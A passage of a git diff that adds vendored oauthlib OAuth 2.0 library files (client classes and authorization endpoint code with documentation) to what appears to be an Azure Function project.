b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/mobile_application.py @@ -0,0 +1,174 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +from ..parameters import parse_implicit_response, prepare_grant_uri +from .base import Client + + +class MobileApplicationClient(Client): + + """A public client utilizing the implicit code grant workflow. + + A user-agent-based application is a public client in which the + client code is downloaded from a web server and executes within a + user-agent (e.g. web browser) on the device used by the resource + owner. Protocol data and credentials are easily accessible (and + often visible) to the resource owner. 
Since such applications + reside within the user-agent, they can make seamless use of the + user-agent capabilities when requesting authorization. + + The implicit grant type is used to obtain access tokens (it does not + support the issuance of refresh tokens) and is optimized for public + clients known to operate a particular redirection URI. These clients + are typically implemented in a browser using a scripting language + such as JavaScript. + + As a redirection-based flow, the client must be capable of + interacting with the resource owner's user-agent (typically a web + browser) and capable of receiving incoming requests (via redirection) + from the authorization server. + + Unlike the authorization code grant type in which the client makes + separate requests for authorization and access token, the client + receives the access token as the result of the authorization request. + + The implicit grant type does not include client authentication, and + relies on the presence of the resource owner and the registration of + the redirection URI. Because the access token is encoded into the + redirection URI, it may be exposed to the resource owner and other + applications residing on the same device. + """ + + response_type = 'token' + + def prepare_request_uri(self, uri, redirect_uri=None, scope=None, + state=None, **kwargs): + """Prepare the implicit grant request URI. + + The client constructs the request URI by adding the following + parameters to the query component of the authorization endpoint URI + using the "application/x-www-form-urlencoded" format, per `Appendix B`_: + + :param redirect_uri: OPTIONAL. The redirect URI must be an absolute URI + and it should have been registered with the OAuth + provider prior to use. As described in `Section 3.1.2`_. + + :param scope: OPTIONAL. The scope of the access request as described by + `Section 3.3`_. These may be any string but are commonly + URIs or various categories such as ``videos`` or ``documents``. + + :param state: RECOMMENDED. An opaque value used by the client to maintain + state between the request and callback. The authorization + server includes this value when redirecting the user-agent back + to the client. The parameter SHOULD be used for preventing + cross-site request forgery as described in `Section 10.12`_. + + :param kwargs: Extra arguments to include in the request URI. + + In addition to supplied parameters, OAuthLib will append the ``client_id`` + that was provided in the constructor as well as the mandatory ``response_type`` + argument, set to ``token``:: + + >>> from oauthlib.oauth2 import MobileApplicationClient + >>> client = MobileApplicationClient('your_id') + >>> client.prepare_request_uri('https://example.com') + 'https://example.com?client_id=your_id&response_type=token' + >>> client.prepare_request_uri('https://example.com', redirect_uri='https://a.b/callback') + 'https://example.com?client_id=your_id&response_type=token&redirect_uri=https%3A%2F%2Fa.b%2Fcallback' + >>> client.prepare_request_uri('https://example.com', scope=['profile', 'pictures']) + 'https://example.com?client_id=your_id&response_type=token&scope=profile+pictures' + >>> client.prepare_request_uri('https://example.com', foo='bar') + 'https://example.com?client_id=your_id&response_type=token&foo=bar' + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2 + .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2 + ..
_`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12 + """ + scope = self.scope if scope is None else scope + return prepare_grant_uri(uri, self.client_id, self.response_type, + redirect_uri=redirect_uri, state=state, scope=scope, **kwargs) + + def parse_request_uri_response(self, uri, state=None, scope=None): + """Parse the response URI fragment. + + If the resource owner grants the access request, the authorization + server issues an access token and delivers it to the client by adding + the following parameters to the fragment component of the redirection + URI using the "application/x-www-form-urlencoded" format: + + :param uri: The callback URI that resulted from the user being redirected + back from the provider to you, the client. + :param state: The state provided in the authorization request. + :param scope: The scopes provided in the authorization request. + :return: Dictionary of token parameters. + :raises: OAuth2Error if response is invalid. + + A successful response should always contain + + **access_token** + The access token issued by the authorization server. Often + a random string. + + **token_type** + The type of the token issued as described in `Section 7.1`_. + Commonly ``Bearer``. + + **state** + If you provided the state parameter in the authorization phase, then + the provider is required to include that exact state value in the + response. + + While it is not mandated it is recommended that the provider include + + **expires_in** + The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + + **scope** + Providers may supply this in all responses but are required to only + if it has changed since the authorization request. + + A few example responses can be seen below:: + + >>> response_uri = 'https://example.com/callback#access_token=sdlfkj452&state=ss345asyht&token_type=Bearer&scope=hello+world' + >>> from oauthlib.oauth2 import MobileApplicationClient + >>> client = MobileApplicationClient('your_id') + >>> client.parse_request_uri_response(response_uri) + { + 'access_token': 'sdlfkj452', + 'token_type': 'Bearer', + 'state': 'ss345asyht', + 'scope': [u'hello', u'world'] + } + >>> client.parse_request_uri_response(response_uri, state='other') + Traceback (most recent call last): + File "<stdin>", line 1, in <module> + File "oauthlib/oauth2/rfc6749/__init__.py", line 598, in parse_request_uri_response + **scope** + File "oauthlib/oauth2/rfc6749/parameters.py", line 197, in parse_implicit_response + raise ValueError("Mismatching or missing state in params.") + ValueError: Mismatching or missing state in params. + >>> def alert_scope_changed(message, old, new): + ... print(message, old, new) + ... + >>> oauthlib.signals.scope_changed.connect(alert_scope_changed) + >>> client.parse_request_body_response(response_body, scope=['other']) + ('Scope has changed from "other" to "hello world".', ['other'], ['hello', 'world']) + + .. _`Section 7.1`: https://tools.ietf.org/html/rfc6749#section-7.1 + ..
_`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + """ + scope = self.scope if scope is None else scope + self.token = parse_implicit_response(uri, state=state, scope=scope) + self.populate_token_attributes(self.token) + return self.token diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/service_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/service_application.py new file mode 100644 index 0000000..fdbc7db --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/service_application.py @@ -0,0 +1,189 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import time + +from oauthlib.common import to_unicode + +from ..parameters import prepare_token_request +from .base import Client + + +class ServiceApplicationClient(Client): + """A public client utilizing the JWT bearer grant. + + JWT bearer tokens can be used to request an access token when a client + wishes to utilize an existing trust relationship, expressed through the + semantics of (and digital signature or keyed message digest calculated + over) the JWT, without a direct user approval step at the authorization + server. + + This grant type does not involve an authorization step. It may be + used by both public and confidential clients. + """ + + grant_type = 'urn:ietf:params:oauth:grant-type:jwt-bearer' + + def __init__(self, client_id, private_key=None, subject=None, issuer=None, + audience=None, **kwargs): + """Initialize a JWT client with defaults for implicit use later. + + :param client_id: Client identifier given by the OAuth provider upon + registration. + + :param private_key: Private key used for signing and encrypting. + Must be given as a string. + + :param subject: The principal that is the subject of the JWT, i.e. + which user is the token requested on behalf of. + For example, ``foo@example.com``. + + :param issuer: The JWT MUST contain an "iss" (issuer) claim that + contains a unique identifier for the entity that issued + the JWT. For example, ``your-client@provider.com``. + + :param audience: A value identifying the authorization server as an + intended audience, e.g. + ``https://provider.com/oauth2/token``. + + :param kwargs: Additional arguments to pass to base client, such as + state and token. See ``Client.__init__.__doc__`` for + details. + """ + super().__init__(client_id, **kwargs) + self.private_key = private_key + self.subject = subject + self.issuer = issuer + self.audience = audience + + def prepare_request_body(self, + private_key=None, + subject=None, + issuer=None, + audience=None, + expires_at=None, + issued_at=None, + extra_claims=None, + body='', + scope=None, + include_client_id=False, + **kwargs): + """Create and add a JWT assertion to the request body. + + :param private_key: Private key used for signing and encrypting. + Must be given as a string. + + :param subject: (sub) The principal that is the subject of the JWT, + i.e. which user is the token requested on behalf of. + For example, ``foo@example.com``. + + :param issuer: (iss) The JWT MUST contain an "iss" (issuer) claim that + contains a unique identifier for the entity that issued + the JWT. For example, ``your-client@provider.com``.
+ + :param audience: (aud) A value identifying the authorization server as an + intended audience, e.g. + ``https://provider.com/oauth2/token``. + + :param expires_at: A unix expiration timestamp for the JWT. Defaults + to an hour from now, i.e. ``time.time() + 3600``. + + :param issued_at: A unix timestamp of when the JWT was created. + Defaults to now, i.e. ``time.time()``. + + :param extra_claims: A dict of additional claims to include in the JWT. + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra parameters. Default ''. + + :param scope: The scope of the access request. + + :param include_client_id: `True` to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in + `Section 3.2.1`_. False otherwise (default). + :type include_client_id: Boolean + + :param not_before: A unix timestamp after which the JWT may be used. + Not included unless provided. * + + :param jwt_id: A unique JWT token identifier. Not included unless + provided. * + + :param kwargs: Extra credentials to include in the token request. + + Parameters marked with a `*` above are not explicit arguments in the + function signature, but are specially documented arguments for items + appearing in the generic `**kwargs` keyworded input. + + The "scope" parameter may be used, as defined in the Assertion + Framework for OAuth 2.0 Client Authentication and Authorization Grants + [I-D.ietf-oauth-assertions] specification, to indicate the requested + scope. + + Authentication of the client is optional, as described in + `Section 3.2.1`_ of OAuth 2.0 [RFC6749] and consequently, the + "client_id" is only needed when a form of client authentication that + relies on the parameter is used. + + The following non-normative example demonstrates an Access Token + Request with a JWT as an authorization grant (with extra line breaks + for display purposes only): + + .. code-block:: http + + POST /token.oauth2 HTTP/1.1 + Host: as.example.com + Content-Type: application/x-www-form-urlencoded + + grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer + &assertion=eyJhbGciOiJFUzI1NiJ9. + eyJpc3Mi[...omitted for brevity...]. + J9l-ZhwP[...omitted for brevity...] + + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + import jwt + + key = private_key or self.private_key + if not key: + raise ValueError('An encryption key must be supplied to make JWT' + ' token requests.') + claim = { + 'iss': issuer or self.issuer, + 'aud': audience or self.audience, + 'sub': subject or self.subject, + 'exp': int(expires_at or time.time() + 3600), + 'iat': int(issued_at or time.time()), + } + + for attr in ('iss', 'aud', 'sub'): + if claim[attr] is None: + raise ValueError( + 'Claim must include %s but none was given.' % attr) + + if 'not_before' in kwargs: + claim['nbf'] = kwargs.pop('not_before') + + if 'jwt_id' in kwargs: + claim['jti'] = kwargs.pop('jwt_id') + + claim.update(extra_claims or {}) + + assertion = jwt.encode(claim, key, 'RS256') + assertion = to_unicode(assertion) + + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + scope = self.scope if scope is None else scope + return prepare_token_request(self.grant_type, + body=body, + assertion=assertion, + scope=scope, + **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/web_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/web_application.py new file mode 100644 index 0000000..f503aa9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/web_application.py @@ -0,0 +1,222 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import warnings + +from ..parameters import ( + parse_authorization_code_response, prepare_grant_uri, + prepare_token_request, +) +from .base import Client + + +class WebApplicationClient(Client): + + """A client utilizing the authorization code grant workflow. + + A web application is a confidential client running on a web + server. Resource owners access the client via an HTML user + interface rendered in a user-agent on the device used by the + resource owner. The client credentials as well as any access + token issued to the client are stored on the web server and are + not exposed to or accessible by the resource owner. + + The authorization code grant type is used to obtain both access + tokens and refresh tokens and is optimized for confidential clients. + As a redirection-based flow, the client must be capable of + interacting with the resource owner's user-agent (typically a web + browser) and capable of receiving incoming requests (via redirection) + from the authorization server. + """ + + grant_type = 'authorization_code' + + def __init__(self, client_id, code=None, **kwargs): + super().__init__(client_id, **kwargs) + self.code = code + + def prepare_request_uri(self, uri, redirect_uri=None, scope=None, + state=None, code_challenge=None, code_challenge_method='plain', **kwargs): + """Prepare the authorization code request URI + + The client constructs the request URI by adding the following + parameters to the query component of the authorization endpoint URI + using the "application/x-www-form-urlencoded" format, per `Appendix B`_: + + :param redirect_uri: OPTIONAL. The redirect URI must be an absolute URI + and it should have been registered with the OAuth + provider prior to use. As described in `Section 3.1.2`_. + + :param scope: OPTIONAL. The scope of the access request as described by + `Section 3.3`_. These may be any string but are commonly + URIs or various categories such as ``videos`` or ``documents``. + + :param state: RECOMMENDED. An opaque value used by the client to maintain + state between the request and callback. The authorization + server includes this value when redirecting the user-agent back + to the client. The parameter SHOULD be used for preventing + cross-site request forgery as described in `Section 10.12`_. + + :param code_challenge: OPTIONAL. PKCE parameter.
REQUIRED if PKCE is enforced. + A challenge derived from the code_verifier that is sent in the + authorization request, to be verified against later. + + :param code_challenge_method: OPTIONAL. PKCE parameter. A method that was used to derive code challenge. + Defaults to "plain" if not present in the request. + + :param kwargs: Extra arguments to include in the request URI. + + In addition to supplied parameters, OAuthLib will append the ``client_id`` + that was provided in the constructor as well as the mandatory ``response_type`` + argument, set to ``code``:: + + >>> from oauthlib.oauth2 import WebApplicationClient + >>> client = WebApplicationClient('your_id') + >>> client.prepare_request_uri('https://example.com') + 'https://example.com?client_id=your_id&response_type=code' + >>> client.prepare_request_uri('https://example.com', redirect_uri='https://a.b/callback') + 'https://example.com?client_id=your_id&response_type=code&redirect_uri=https%3A%2F%2Fa.b%2Fcallback' + >>> client.prepare_request_uri('https://example.com', scope=['profile', 'pictures']) + 'https://example.com?client_id=your_id&response_type=code&scope=profile+pictures' + >>> client.prepare_request_uri('https://example.com', code_challenge='kjasBS523KdkAILD2k78NdcJSk2k3KHG6') + 'https://example.com?client_id=your_id&response_type=code&code_challenge=kjasBS523KdkAILD2k78NdcJSk2k3KHG6' + >>> client.prepare_request_uri('https://example.com', code_challenge_method='S256') + 'https://example.com?client_id=your_id&response_type=code&code_challenge_method=S256' + >>> client.prepare_request_uri('https://example.com', foo='bar') + 'https://example.com?client_id=your_id&response_type=code&foo=bar' + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2 + .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12 + """ + scope = self.scope if scope is None else scope + return prepare_grant_uri(uri, self.client_id, 'code', + redirect_uri=redirect_uri, scope=scope, state=state, code_challenge=code_challenge, + code_challenge_method=code_challenge_method, **kwargs) + + def prepare_request_body(self, code=None, redirect_uri=None, body='', + include_client_id=True, code_verifier=None, **kwargs): + """Prepare the access token request body. + + The client makes a request to the token endpoint by adding the + following parameters using the "application/x-www-form-urlencoded" + format in the HTTP request entity-body: + + :param code: REQUIRED. The authorization code received from the + authorization server. + + :param redirect_uri: REQUIRED, if the "redirect_uri" parameter was included in the + authorization request as described in `Section 4.1.1`_, and their + values MUST be identical. + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra parameters. Default ''. + + :param include_client_id: `True` (default) to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in `Section 3.2.1`_. + :type include_client_id: Boolean + + :param code_verifier: OPTIONAL. A cryptographically random string that is used to correlate the + authorization request to the token request. + + :param kwargs: Extra parameters to include in the token request.
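Putting the two WebApplicationClient halves together with PKCE, as a sketch; the endpoint, redirect URI and the returned code are placeholders::

    from oauthlib.oauth2 import WebApplicationClient

    client = WebApplicationClient('my-client-id')
    verifier = client.create_code_verifier(64)
    challenge = client.create_code_challenge(verifier, 'S256')
    url = client.prepare_request_uri(
        'https://provider.example/oauth2/authorize',       # placeholder
        redirect_uri='https://app.example/callback',
        code_challenge=challenge, code_challenge_method='S256',
        state='xyz123')
    # ...the user authorizes and returns with ?code=...&state=xyz123...
    body = client.prepare_request_body(
        code='returned-auth-code',                         # placeholder
        redirect_uri='https://app.example/callback',
        code_verifier=verifier)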
+ + In addition OAuthLib will add the ``grant_type`` parameter set to + ``authorization_code``. + + If the client type is confidential or the client was issued client + credentials (or assigned other authentication requirements), the + client MUST authenticate with the authorization server as described + in `Section 3.2.1`_:: + + >>> from oauthlib.oauth2 import WebApplicationClient + >>> client = WebApplicationClient('your_id') + >>> client.prepare_request_body(code='sh35ksdf09sf') + 'grant_type=authorization_code&code=sh35ksdf09sf' + >>> client.prepare_request_body(code_verifier='KB46DCKJ873NCGXK5GD682NHDKK34GR') + 'grant_type=authorization_code&code_verifier=KB46DCKJ873NCGXK5GD682NHDKK34GR' + >>> client.prepare_request_body(code='sh35ksdf09sf', foo='bar') + 'grant_type=authorization_code&code=sh35ksdf09sf&foo=bar' + + `Section 3.2.1` also states: + In the "authorization_code" "grant_type" request to the token + endpoint, an unauthenticated client MUST send its "client_id" to + prevent itself from inadvertently accepting a code intended for a + client with a different "client_id". This protects the client from + substitution of the authentication code. (It provides no additional + security for the protected resource.) + + .. _`Section 4.1.1`: https://tools.ietf.org/html/rfc6749#section-4.1.1 + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + code = code or self.code + if 'client_id' in kwargs: + warnings.warn("`client_id` has been deprecated in favor of " + "`include_client_id`, a boolean value which will " + "include the already configured `self.client_id`.", + DeprecationWarning) + if kwargs['client_id'] != self.client_id: + raise ValueError("`client_id` was supplied as an argument, but " + "it does not match `self.client_id`") + + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + return prepare_token_request(self.grant_type, code=code, body=body, + redirect_uri=redirect_uri, code_verifier=code_verifier, **kwargs) + + def parse_request_uri_response(self, uri, state=None): + """Parse the URI query for code and state. + + If the resource owner grants the access request, the authorization + server issues an authorization code and delivers it to the client by + adding the following parameters to the query component of the + redirection URI using the "application/x-www-form-urlencoded" format: + + :param uri: The callback URI that resulted from the user being redirected + back from the provider to you, the client. + :param state: The state provided in the authorization request. + + **code** + The authorization code generated by the authorization server. + The authorization code MUST expire shortly after it is issued + to mitigate the risk of leaks. A maximum authorization code + lifetime of 10 minutes is RECOMMENDED. The client MUST NOT + use the authorization code more than once. If an authorization + code is used more than once, the authorization server MUST deny + the request and SHOULD revoke (when possible) all tokens + previously issued based on that authorization code. + The authorization code is bound to the client identifier and + redirection URI. + + **state** + If the "state" parameter was present in the authorization request. 
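When the strict state check described here fails, ``parse_request_uri_response`` raises ``MismatchingStateError`` (see the doctest that follows); a caller would typically treat that as a possible CSRF attempt, sketched with a placeholder callback URL::

    from oauthlib.oauth2 import WebApplicationClient
    from oauthlib.oauth2.rfc6749.errors import MismatchingStateError

    client = WebApplicationClient('my-client-id')          # placeholder id
    try:
        client.parse_request_uri_response(
            'https://app.example/callback?code=abc&state=evil',  # placeholder
            state='expected-state')
    except MismatchingStateError:
        # The returned state differs from the one we sent: treat as a
        # possible CSRF attempt and abort the flow.
        pass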
+ + This method is mainly intended to enforce strict state checking with + the added benefit of easily extracting parameters from the URI:: + + >>> from oauthlib.oauth2 import WebApplicationClient + >>> client = WebApplicationClient('your_id') + >>> uri = 'https://example.com/callback?code=sdfkjh345&state=sfetw45' + >>> client.parse_request_uri_response(uri, state='sfetw45') + {'state': 'sfetw45', 'code': 'sdfkjh345'} + >>> client.parse_request_uri_response(uri, state='other') + Traceback (most recent call last): + File "<stdin>", line 1, in <module> + File "oauthlib/oauth2/rfc6749/__init__.py", line 357, in parse_request_uri_response + back from the provider to you, the client. + File "oauthlib/oauth2/rfc6749/parameters.py", line 153, in parse_authorization_code_response + raise MismatchingStateError() + oauthlib.oauth2.rfc6749.errors.MismatchingStateError + """ + response = parse_authorization_code_response(uri, state=state) + self.populate_code_attributes(response) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__init__.py new file mode 100644 index 0000000..ce6276c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__init__.py @@ -0,0 +1,17 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +from .authorization import AuthorizationEndpoint +from .introspect import IntrospectEndpoint +from .metadata import MetadataEndpoint +from .pre_configured import ( + BackendApplicationServer, LegacyApplicationServer, MobileApplicationServer, + Server, WebApplicationServer, +) +from .resource import ResourceEndpoint +from .revocation import RevocationEndpoint +from .token import TokenEndpoint diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..42aef60 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/authorization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/authorization.cpython-39.pyc new file mode 100644 index 0000000..311d8b4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/authorization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..d8ec53c Binary files /dev/null and
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/introspect.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/introspect.cpython-39.pyc new file mode 100644 index 0000000..0228915 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/introspect.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/metadata.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/metadata.cpython-39.pyc new file mode 100644 index 0000000..77f2f4d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/metadata.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/pre_configured.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/pre_configured.cpython-39.pyc new file mode 100644 index 0000000..66b1c27 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/pre_configured.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/resource.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/resource.cpython-39.pyc new file mode 100644 index 0000000..10b3c05 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/resource.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/revocation.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/revocation.cpython-39.pyc new file mode 100644 index 0000000..256d2f1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/revocation.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/token.cpython-39.pyc new file mode 100644 index 0000000..34969f5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/token.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/authorization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/authorization.py new file mode 100644 index 0000000..c02e7fa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/authorization.py @@ -0,0 +1,114 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import logging + +from oauthlib.common import Request +from oauthlib.oauth2.rfc6749 import utils + +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class AuthorizationEndpoint(BaseEndpoint): + + """Authorization endpoint - used by the client to obtain authorization + from the resource owner via user-agent redirection. + + The authorization endpoint is used to interact with the resource + owner and obtain an authorization grant. The authorization server + MUST first verify the identity of the resource owner. The way in + which the authorization server authenticates the resource owner (e.g. + username and password login, session cookies) is beyond the scope of + this specification. + + The endpoint URI MAY include an "application/x-www-form-urlencoded" + formatted (per `Appendix B`_) query component, + which MUST be retained when adding additional query parameters. The + endpoint URI MUST NOT include a fragment component:: + + https://example.com/path?query=component # OK + https://example.com/path?query=component#fragment # Not OK + + Since requests to the authorization endpoint result in user + authentication and the transmission of clear-text credentials (in the + HTTP response), the authorization server MUST require the use of TLS + as described in Section 1.6 when sending requests to the + authorization endpoint:: + + # We will deny any request whose URI scheme is not https + + The authorization server MUST support the use of the HTTP "GET" + method [RFC2616] for the authorization endpoint, and MAY support the + use of the "POST" method as well:: + + # HTTP method is currently not enforced + + Parameters sent without a value MUST be treated as if they were + omitted from the request. The authorization server MUST ignore + unrecognized request parameters. Request and response parameters + MUST NOT be included more than once:: + + # Enforced through the design of oauthlib.common.Request + + ..
_`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + """ + + def __init__(self, default_response_type, default_token_type, + response_types): + BaseEndpoint.__init__(self) + self._response_types = response_types + self._default_response_type = default_response_type + self._default_token_type = default_token_type + + @property + def response_types(self): + return self._response_types + + @property + def default_response_type(self): + return self._default_response_type + + @property + def default_response_type_handler(self): + return self.response_types.get(self.default_response_type) + + @property + def default_token_type(self): + return self._default_token_type + + @catch_errors_and_unavailability + def create_authorization_response(self, uri, http_method='GET', body=None, + headers=None, scopes=None, credentials=None): + """Extract response_type and route to the designated handler.""" + request = Request( + uri, http_method=http_method, body=body, headers=headers) + request.scopes = scopes + # TODO: decide whether this should be a required argument + request.user = None # TODO: explain this in docs + for k, v in (credentials or {}).items(): + setattr(request, k, v) + response_type_handler = self.response_types.get( + request.response_type, self.default_response_type_handler) + log.debug('Dispatching response_type %s request to %r.', + request.response_type, response_type_handler) + return response_type_handler.create_authorization_response( + request, self.default_token_type) + + @catch_errors_and_unavailability + def validate_authorization_request(self, uri, http_method='GET', body=None, + headers=None): + """Extract response_type and route to the designated handler.""" + request = Request( + uri, http_method=http_method, body=body, headers=headers) + + request.scopes = utils.scope_to_list(request.scope) + + response_type_handler = self.response_types.get( + request.response_type, self.default_response_type_handler) + return response_type_handler.validate_authorization_request(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/base.py new file mode 100644 index 0000000..7d572f4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/base.py @@ -0,0 +1,113 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. 
